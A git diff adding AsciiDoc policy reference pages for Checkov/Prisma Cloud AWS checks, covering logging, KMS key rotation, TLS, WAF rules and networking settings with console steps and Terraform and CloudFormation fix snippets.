706ba56f-78d7-4bd6-ad76-f716914e0b63 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py[CKV_AWS_121] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +AWS Config is a web service that performs the configuration management of supported AWS resources within your account and delivers log files to you. +The recorded information includes: the configuration item (AWS resource), relationships between configuration items (AWS resources), and any configuration changes between resources. +The AWS configuration item history captured by AWS Config enables security analysis, resource change tracking, and compliance auditing. +We recommend you enable AWS Config in all regions. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To implement AWS Config configuration using the AWS Management Console, follow these steps: + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. At the top right of the console select the _region_ you want to focus on. + +. Click * Services*. + +. Click * Config*. + +. Define which resources you want to record in the selected region. ++ +Include global resources (IAM resources). + +. Select an _S3 bucket_ in the same account, or in another managed AWS account. + +. Create an _SNS Topic_ from the same AWS account, or from another managed AWS account. + + +* CLI Command* + + +To change the policy using the following steps and commands: + +. Ensure there is an appropriate S3 bucket, SNS topic, and IAM role per the AWS Config Service prerequisites. + +. Set up the configuration recorder: ++ +[,bash] +---- +aws configservice subscribe +--s3-bucket my-config-bucket +--sns-topic arn:aws:sns:us-east-1:012345678912:my-config-notice +--iam-role arn:aws:iam::012345678912:role/myConfigRole +---- + +. Start the configuration recorder: +[,bash] +---- +start-configuration-recorder +--configuration-recorder-name & lt;value> +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_config_configuration_aggregator +* *Arguments:* all_regions + + +[source,go] +---- +{ + "resource "aws_config_configuration_aggregator" "organization" { + name = "example" + account_aggregation_source { + account_ids = ["123456789012"] ++ all_regions = true + }", + + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-7.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-7.adoc new file mode 100644 index 000000000..37ac55b7d --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-7.adoc @@ -0,0 +1,105 @@ +== AWS CloudTrail logs are not encrypted using Customer Master Keys (CMKs) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c2b84f89-7ec8-473e-a6af-404feeeb96c5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py[CKV_AWS_35] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +AWS CloudTrail is a web service that records AWS API calls for an account, and makes those logs available to users and resources in accordance with IAM policies. +AWS Key Management Service (KMS) is a managed service that helps create and control the encryption keys used to encrypt account data. +It uses Hardware Security Modules (HSMs) to protect the security of encryption keys. +CloudTrail logs can be configured to leverage server-side encryption (SSE) and KMS customer created master keys (CMK) to further protect CloudTrail logs. +We recommend that CloudTrail logs are configured to use SSE-KMS, providing additional confidentiality controls on log data. +A given user must have S3 read permission on the corresponding log bucket and must be granted decrypt permission by the CMK policy. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To configure CloudTrail to use SSE-KMS using the Management Console, follow these steps: + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. Open the * https://console.aws.amazon.com/cloudtrail/ [Amazon CloudTrail console]*. + +. In the left navigation pane, click * Trails*. + +. Select a _Trail_. + +. Navigate to the * S3* section, click the edit button (pencil icon). + +. Click * Advanced*. + +. From the * KMS key Id* drop-down menu, select an existing CMK. ++ +NOTE: Ensure the CMK is located in the same region as the S3 bucket. + +. For CloudTrail as a service to encrypt and decrypt log files using the CMK provided, apply a KMS Key policy on the selected CMK. + +. Click * Save*. + +. You will see a notification message stating that you need to have decrypt permissions on the specified KMS key to decrypt log files. ++ +Click * Yes*. + + +* CLI Command* + + +To update the CloudTrail, use the following command: +[,bash] +---- +aws cloudtrail update-trail +--name & lt;trail_name> +--kms-id & lt;cloudtrail_kms_key> aws kms put-key-policy +--key-id & lt;cloudtrail_kms_key> +--policy & lt;cloudtrail_kms_key_policy> +---- +//// + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::CloudTrail::Trail +* *Arguments:* Properties.KMSKeyId + + +[source,yaml] +---- +Resources: + myTrail: + Type: AWS::CloudTrail::Trail + Properties: + ... ++ KMSKeyId: alias/MyAliasName +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-8.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-8.adoc new file mode 100644 index 000000000..91914f36e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-8.adoc @@ -0,0 +1,143 @@ +== AWS Customer Master Key (CMK) rotation is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 497f7e2c-b702-47c7-9a07-f0f6404ac896 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/KMSRotation.py[CKV_AWS_7] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + +//// +Bridgecrew +Prisma Cloud +* AWS Customer Master Key (CMK) rotation is not enabled* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 497f7e2c-b702-47c7-9a07-f0f6404ac896 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/KMSRotation.py [CKV_AWS_7] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== +//// + + +=== Description + + +AWS Key Management Service (KMS) allows customers to rotate the backing key. +This is where key material is stored within the KMS, and tied to the key ID of the Customer Created customer master key (CMK). +The backing key is used to perform cryptographic operations such as encryption and decryption. +Automated key rotation currently retains all prior backing keys, allowing decryption of encrypted data to take place transparently. +We recommend you enable CMK key rotation to help reduce the potential impact of a compromised key. +Data encrypted with a new key cannot be accessed with a previous key, that may have been exposed. + +//// +=== Fix - Runtime + + +* AWS Console* + + +Procedure: + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. Open the https://console.aws.amazon.com/kms/home [Amazon KMS console]. + +. In the left navigation pane, select * customer managed keys*. + +. Select the customer master key (CMK) in scope. + +. Navigate to the * Key Rotation* tab. + +. Select * Rotate this key every year*. + +. Click * Save*. + + +* CLI Command* + + +Change the policy to enable key rotation using CLI command: +[,bash] +---- +aws kms enable-key-rotation --key-id & lt;kms_key_id> +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_kms_key +* *Arguments:* enable_key_rotation - (Optional) Specifies whether key rotation is enabled. +Defaults to false. + + +[source,go] +---- +{ + "resource "aws_kms_key" "kms_key_1" { + ... + is_enabled = true ++ enable_key_rotation = true +}", +} +---- + + +*CloudFormation* + + +* *Resource:* `AWS::KMS::Key` +* *Attribute*: `EnableKeyRotation` - (Optional) Specifies whether key rotation is enabled. +Defaults to false. + + +[source,yaml] +---- +{ + "Type: AWS::KMS::Key +Properties: + ... ++ EnableKeyRotation: true0", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/logging-9-enable-vpc-flow-logging.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-9-enable-vpc-flow-logging.adoc new file mode 100644 index 000000000..0a85bef6c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/logging-9-enable-vpc-flow-logging.adoc @@ -0,0 +1,93 @@ +== AWS VPC Flow Logs not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 49f4760d-c951-40e4-bfe1-08acaa17672a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml[CKV2_AWS_11] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +VPC Flow Logs is a feature that enables you to capture information about the IP traffic going to and from network interfaces in your VPC. +After you have created a flow log, you can view and retrieve its data in Amazon CloudWatch Logs. +VPC Flow Logs provide visibility into network traffic that traverses the VPC. +We recommend that VPC Flow Logs are enabled for packet Rejects for VPCs to help detect anomalous traffic and insight during security workflows. + +=== Fix - Runtime + + +*AWS Console* + + +To determine if the VPC Flow logs is enabled, follow these steps: + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/] + +. Select *Services*. + +. Select *VPC*. + +. In the left navigation pane, select *Your VPCs*. + +. Select a *VPC*. + +. In the right pane, select the *Flow Logs* tab. + +. If no Flow Log exists, click *Create Flow Log*. + +. Set *Filter* to *Reject*. + +. Enter a *Role* and *Destination Log Group*. + +. Click *Create Log Flow*. + +. Click *CloudWatch Logs Group*. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_flow_log + aws_vpc +* *Arguments:* vpc_id (of aws_flow_log) + + +[source,go] +---- +{ + "resource "aws_flow_log" "example" { + iam_role_arn = "arn" + log_destination = "log" + traffic_type = "ALL" ++ vpc_id = aws_vpc.ok_vpc.id +} + + +resource "aws_vpc" "ok_vpc" { + cidr_block = "10.0.0.0/16" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/aws-networking-policies.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/aws-networking-policies.adoc new file mode 100644 index 000000000..d47076ce6 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/aws-networking-policies.adoc @@ -0,0 +1,208 @@ +== AWS Networking Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-aws-networking-37.adoc[DocDB TLS is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBTLS.py[CKV_AWS_90] +|MEDIUM + + +|xref:bc-aws-networking-63.adoc[AWS CloudFront web distribution using insecure TLS version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py[CKV_AWS_174] +|MEDIUM + + +|xref:bc-aws-networking-64.adoc[AWS WAF does not have associated rules] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py[CKV_AWS_175] +|LOW + + +|xref:ensure-aws-acm-certificate-enables-create-before-destroy.adoc[AWS ACM certificate does not enable Create before Destroy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py[CKV_AWS_233] +|LOW + + +|xref:ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate.adoc[AWS CloudFront web distribution with default SSL certificate] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml[CKV2_AWS_42] +|MEDIUM + + +|xref:ensure-aws-database-migration-service-endpoints-have-ssl-configured.adoc[AWS Database Migration Service endpoint do not have SSL configured] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml[CKV2_AWS_49] +|MEDIUM + + +|xref:ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20.adoc[AWS NACL allows ingress from 0.0.0.0/0 to port 20] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py[CKV_AWS_230] +|LOW + + +|xref:ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21.adoc[AWS NACL allows ingress from 0.0.0.0/0 to port 21] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py[CKV_AWS_229] +|LOW + + +|xref:ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22.adoc[AWS NACL allows ingress from 0.0.0.0/0 to port 22] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py[CKV_AWS_232] +|LOW + + +|xref:ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389.adoc[AWS NACL allows ingress from 0.0.0.0/0 to port 3389] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py[CKV_AWS_231] +|LOW + + +|xref:ensure-aws-rds-security-groups-are-defined.adoc[AWS RDS security groups are not defined] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py[CKV_AWS_198] +|LOW + + +|xref:ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic.adoc[AWS route table with VPC peering overly permissive to all traffic] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml[CKV2_AWS_44 ] +|HIGH + + +|xref:ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports.adoc[AWS Security Group allows all traffic on all ports] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py[CKV_AWS_277] +|MEDIUM + + +|xref:ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80.adoc[AWS security groups allow ingress from 0.0.0.0/0 to port 80] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py[CKV_AWS_260] +|LOW + + +|xref:ensure-no-default-vpc-is-planned-to-be-provisioned.adoc[Default VPC is planned to be provisioned] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py[CKV_AWS_148] +|LOW + + +|xref:ensure-public-api-gateway-are-protected-by-waf.adoc[Public API gateway not configured with AWS Web Application Firewall v2 (AWS WAFv2)] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml[CKV2_AWS_29] +|MEDIUM + + +|xref:ensure-public-facing-alb-are-protected-by-waf.adoc[AWS Application Load Balancer (ALB) not configured with AWS Web Application Firewall v2 (AWS WAFv2)] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml[CKV2_AWS_28] +|MEDIUM + + +|xref:ensure-redshift-is-not-deployed-outside-of-a-vpc.adoc[Redshift is deployed outside of a VPC] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py[CKV_AWS_154] +|LOW + + +|xref:ensure-that-alb-drops-http-headers.adoc[ALB does not drop HTTP headers] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py[CKV_AWS_131] +|MEDIUM + + +|xref:ensure-that-alb-redirects-http-requests-into-https-ones.adoc[ALB does not redirect HTTP requests into HTTPS ones] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml[CKV2_AWS_20] +|LOW + + +|xref:ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances.adoc[Not all EIP addresses allocated to a VPC are attached to EC2 instances] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml[CKV2_AWS_19] +|LOW + + +|xref:ensure-that-all-nacl-are-attached-to-subnets.adoc[Not all NACL are attached to subnets] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml[CKV2_AWS_1] +|LOW + + +|xref:ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world.adoc[Amazon EMR clusters' security groups are open to the world] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml[CKV2_AWS_7] +|LOW + + +|xref:ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks.adoc[Auto scaling groups associated with a load balancer do not use elastic load balancing health checks] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml[CKV2_AWS_15] +|LOW + + +|xref:ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance.adoc[AWS SageMaker notebook instance configured with direct internet access feature] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py[CKV_AWS_122] +|MEDIUM + + +|xref:ensure-that-elasticsearch-is-configured-inside-a-vpc.adoc[AWS Elasticsearch is not configured inside a VPC] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py[CKV_AWS_137] +|LOW + + +|xref:ensure-that-elb-is-cross-zone-load-balancing-enabled.adoc[AWS Elastic Load Balancer (Classic) with cross-zone load balancing disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py[CKV_AWS_138] +|MEDIUM + + +|xref:ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled.adoc[Load Balancer (Network/Gateway) does not have cross-zone load balancing enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LBCrossZone.py[CKV_AWS_152] +|LOW + + +|xref:ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis.adoc[Security Groups are not attached to EC2 instances or ENIs] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml[CKV2_AWS_5] +|LOW + + +|xref:ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance.adoc[VPC endpoint service is not configured for manual acceptance] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py[CKV_AWS_123] +|LOW + + +|xref:ensure-transfer-server-is-not-exposed-publicly.adoc[Ensure Transfer Server is exposed publicly.] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py[CKV_AWS_164] +|MEDIUM + + +|xref:ensure-vpc-subnets-do-not-assign-public-ip-by-default.adoc[AWS VPC subnets should not allow automatic public IP assignment] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SubnetPublicIP.py[CKV_AWS_130] +|MEDIUM + + +|xref:ensure-waf-prevents-message-lookup-in-log4j2.adoc[WAF enables message lookup in Log4j2] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py[CKV_AWS_192] +|HIGH + + +|xref:networking-1-port-security.adoc[AWS Security Group allows all traffic on SSH port (22)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py[CKV_AWS_24] +|LOW + + +|xref:networking-2.adoc[AWS Security Group allows all traffic on RDP port (3389)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py[CKV_AWS_25] +|LOW + +|xref:networking-29.adoc[AWS Elastic Load Balancer v2 (ELBv2) listener that allow connection requests over HTTP] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py[CKV_AWS_2] +|MEDIUM + + +|xref:networking-31.adoc[Not every Security Group rule has a description] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py[CKV_AWS_23] +|LOW + + +|xref:networking-32.adoc[CloudFront distribution ViewerProtocolPolicy is not set to HTTPS] +|Not Supported +| + + +|xref:networking-4.adoc[AWS Default Security Group does not restrict all traffic] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml[CKV2_AWS_12] +|LOW + + +|xref:s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached.adoc[S3 Bucket does not have public access blocks] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml[CKV2_AWS_6] +|LOW + + +|=== + diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-37.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-37.adoc new file mode 100644 index 000000000..86c5c17cb --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-37.adoc @@ -0,0 +1,113 @@ +== DocDB TLS is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a6ed2eba-5411-4c7e-9a81-0d9def87ecfe + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBTLS.py[CKV_AWS_90] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +TLS can be used to encrypt the connection between an application and a DocDB cluster. +By default, encryption in transit is enabled for newly created clusters. +It can optionally be disabled when the cluster is created, or at a later time. +When enabled, secure connections using TLS are required to connect to the cluster. + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Sign in to the AWS Management Console, and open the Amazon DocumentDB console at https://console.aws.amazon.com/docdb. + +. In the left navigation pane, choose Clusters. + +. In the list of clusters, select the name of your cluster. + +. The resulting page shows the details of the cluster that you selected. ++ +Scroll down to Cluster details. ++ +At the bottom of that section, locate the parameter group's name below Cluster parameter group. + + +* CLI Command* + + + + +[source,shell] +---- +{ + "aws docdb describe-db-clusters \\ + --db-cluster-identifier sample-cluster \\ + --query 'DBClusters[*].[DBClusterIdentifier,DBClusterParameterGroup]' ", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_docdb_cluster_parameter_group +* *Argument:* parameter - (Optional) A list of documentDB parameters to apply. + + +[source,go] +---- +resource "aws_docdb_cluster_parameter_group" "example" { + ... + name = "example" ++ parameter { ++ name = "tls" ++ value = "enabled" ++ } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::DocDB::DBClusterParameterGroup +* *Argument:* Parameters.tls + + +[source,yaml] +---- +Resources: + DocDBParameterGroupEnabled: + Type: AWS::DocDB::DBClusterParameterGroup + Properties: + ... + Parameters: + ... +- tls: "disabled" ++ tls: "enabled" +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-63.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-63.adoc new file mode 100644 index 000000000..c5bd6d390 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-63.adoc @@ -0,0 +1,79 @@ +== AWS CloudFront web distribution using insecure TLS version + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 45e37556-3d26-4cdb-8780-5b7fc5f60e01 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py[CKV_AWS_174] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +This policy identifies AWS CloudFront web distributions which are configured with TLS versions for HTTPS communication between viewers and CloudFront. +As a best practice, use TLSv1.1_2016 or later as the minimum protocol version in your CloudFront distribution security policies + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Sign in to the AWS console + +. Navigate to CloudFront Distributions Dashboard + +. Click on the reported distribution + +. On 'General' tab, Click on 'Edit' button + +. On 'Edit Distribution' page, Set 'Security Policy' to TLSv1.1_2016 or later as per your requirement. + +. Click on 'Yes, Edit' +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudfront_distribution +* *Arguments:* minimum_protocol_version + + +[source,go] +---- +{ + "resource "aws_cloudfront_distribution" "pass" { +... + + viewer_certificate { + cloudfront_default_certificate = false + minimum_protocol_version = "TLSv1.2_2018" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-64.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-64.adoc new file mode 100644 index 000000000..ab566722b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-64.adoc @@ -0,0 +1,115 @@ +== AWS WAF does not have associated rules + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c6f2d03c-d2fd-491d-9a29-f555709a47ae + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py[CKV_AWS_175] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +AWS WAF is a web application firewall that helps protect web applications from attacks by allowing you to configure rules that allow, block, or monitor (count) web requests based on conditions that you define. +These conditions include IP addresses, HTTP headers, HTTP body, URI strings, SQL injection and cross-site scripting. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_wafv2_web_acl +* *Attribute* rule - (Optional) The rule blocks used to identify the web requests that you want to allow, block, or count. +See Rules below for details. + + +[source,go] +---- +{ + "resource "aws_wafv2_web_acl" "example" { + name = "managed-rule-example" + description = "Example of a managed rule." + scope = "REGIONAL" + + default_action { + allow {} + } + + ++ rule { + name = "rule-1" + priority = 1 + + override_action { + count {} + } + + + statement { + managed_rule_group_statement { + name = "AWSManagedRulesCommonRuleSet" + vendor_name = "AWS" + + excluded_rule { + name = "SizeRestrictions_QUERYSTRING" + } + + + excluded_rule { + name = "NoUserAgent_HEADER" + } + + + scope_down_statement { + geo_match_statement { + country_codes = ["US", "NL"] + } + + } + } + + } + + visibility_config { + cloudwatch_metrics_enabled = false + metric_name = "friendly-rule-metric-name" + sampled_requests_enabled = false + } + + } + + tags = { + Tag1 = "Value1" + Tag2 = "Value2" + } + + + visibility_config { + cloudwatch_metrics_enabled = false + metric_name = "friendly-metric-name" + sampled_requests_enabled = false + } + +} +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-65.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-65.adoc new file mode 100644 index 000000000..5549d2d00 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/bc-aws-networking-65.adoc @@ -0,0 +1,38 @@ +== AWS CloudFront distribution does not have a strict security headers policy attached + + +=== Description + +Amazon CloudFront is a content delivery network (CDN) that delivers static and dynamic web content using a global network of edge locations. +CloudFront introduced response headers policies to address this need and give the customers more control in defining header modifications performed by CloudFront. +While it has been possible to manipulate response headers with CloudFront's edge serverless options, typically it doesn't require a custom logic unique to the use case. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudfront_distribution +* *Argument:* response_headers_policy_id (Optional) - The identifier for a response headers policy. + + +[source,go] +---- +{ + "resource "aws_cloudfront_distribution" "s3_distribution" { + origin { + domain_name = aws_s3_bucket.b.bucket_regional_domain_name + origin_id = local.s3_origin_id + + s3_origin_config { + origin_access_identity = "origin-access-identity/cloudfront/ABCDEFG1234567" + } + + } + ++ default_cache_behavior { ++ response_headers_policy_id = aws_cloudfront_response_headers_policy.pass.id ++ }", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-acm-certificate-enables-create-before-destroy.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-acm-certificate-enables-create-before-destroy.adoc new file mode 100644 index 000000000..ccf586c8f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-acm-certificate-enables-create-before-destroy.adoc @@ -0,0 +1,60 @@ +== AWS ACM certificate does not enable Create before Destroy + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bbab99c0-d187-428c-b2f4-a86b7a851b5a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py[CKV_AWS_233] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +It is recommended to enable create_before_destroy argument inside the resource lifecycle configuration block to avoid a possible outage when the certificate needs to be recreated during an update. + +=== Fix - Buildtime + + +*CloudFormation* + + +CloudFormation creates a new certificate first and then will delete the old one automatically. + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_acm_certificate" "example" { + domain_name = "example.com" + validation_method = "DNS" + ++ lifecycle { ++ create_before_destroy = true ++ } +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate.adoc new file mode 100644 index 000000000..55ee32beb --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate.adoc @@ -0,0 +1,72 @@ +== AWS CloudFront web distribution with default SSL certificate + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 